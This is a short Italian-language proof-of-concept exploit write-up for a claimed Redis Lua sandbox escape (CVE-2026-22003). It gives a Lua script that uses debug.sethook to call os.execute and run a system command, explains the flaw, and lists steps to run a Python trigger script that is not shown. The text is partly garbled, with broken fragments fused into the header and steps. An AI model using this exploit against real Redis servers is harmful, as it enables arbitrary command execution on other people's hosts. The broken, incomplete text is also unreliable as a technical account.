
Exploit proof-of-concept per CVE-2026-22003 che dimostra l'escape dalla sandbox Lua di Redis tramite debug.sethook per eseguire comandi di sistema arbitrari.
debug.sethook-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
debug.sethook(function()
-- This hook runs in a privileged context
os.execute("id > /tmp/redis_escape")
end, "r")
local a = 1
end
return escape()
La sandbox Lua di Redis non disabilita correttamente la funzione debug.sethook. Un attaccante che può eseguire script Lua può installare un hook che viene eseguito in un contesto privilegiato e uscire dalla sandbox per eseguire comandi di sistema arbitrari.
os.execute o funzioni simili.EVAL).pip install redis
python trigger_redis_sandbox_escape.py
Il file /tmp/redis_escape viene creato, dimostrando l'esecuzione di comandi.